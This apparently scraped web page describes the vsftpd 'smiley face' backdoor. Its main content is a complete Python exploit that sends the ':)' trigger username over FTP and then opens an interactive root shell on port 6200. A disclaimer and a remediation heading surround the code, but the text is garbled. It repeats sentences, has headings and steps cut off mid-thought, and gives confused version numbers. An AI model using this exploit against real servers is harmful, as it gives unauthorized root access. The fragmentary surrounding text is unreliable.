The exploit code is quite simple and can be summarized as follows:
You can trigger the backdoor with a simple FTP client and netcat . This is the “smiley face” vulnerability in action.
The script is quite simple and can be used to test the vulnerability of a vsftpd server. However, it's essential to note that using this script to exploit a server without permission is illegal and can result in severe consequences. vsftpd 208 exploit github link
For those looking to understand the mechanics behind the attack, reports are available.
import socket import time import telnetlib def exploit(target_ip): # Step 1: Trigger the backdoor on standard FTP port 21 print("[*] Connecting to target FTP...") ftp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ftp_sock.connect((target_ip, 21)) # Read the banner ftp_sock.recv(1024) # Send the trigger username and a fake password ftp_sock.send(b"USER backdoored:)\r\n") ftp_sock.recv(1024) ftp_sock.send(b"PASS password\r\n") # Give the server a brief moment to spawn the shell time.sleep(1) ftp_sock.close() # Step 2: Interact with the spawned shell on port 6200 print("[+] Attempting to connect to backdoor shell on port 6200...") try: shell_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) shell_sock.connect((target_ip, 6200)) print("[+] Success! Root shell opened.") # Pass control over to the user via Telnet interactive mode t = telnetlib.Telnet() t.sock = shell_sock t.interact() except Exception as e: print("[-] Connection failed. Target may not be vulnerable.") # Usage example # exploit("192.168.1.50") Use code with caution. 4. Remediation and Modern Context The exploit code is quite simple and can
md5sum /usr/sbin/vsftpd
:
A technical breakdown of the vsf_sysutil_extra() function used to trigger the backdoor is available on PwnHouse's GitHub . Pre-2.0.8 Vulnerabilities:
Then (in a separate terminal):
The server (if backdoored) would instantly open a listener on TCP port . Connecting to that port with netcat would give a root shell immediately — no password required.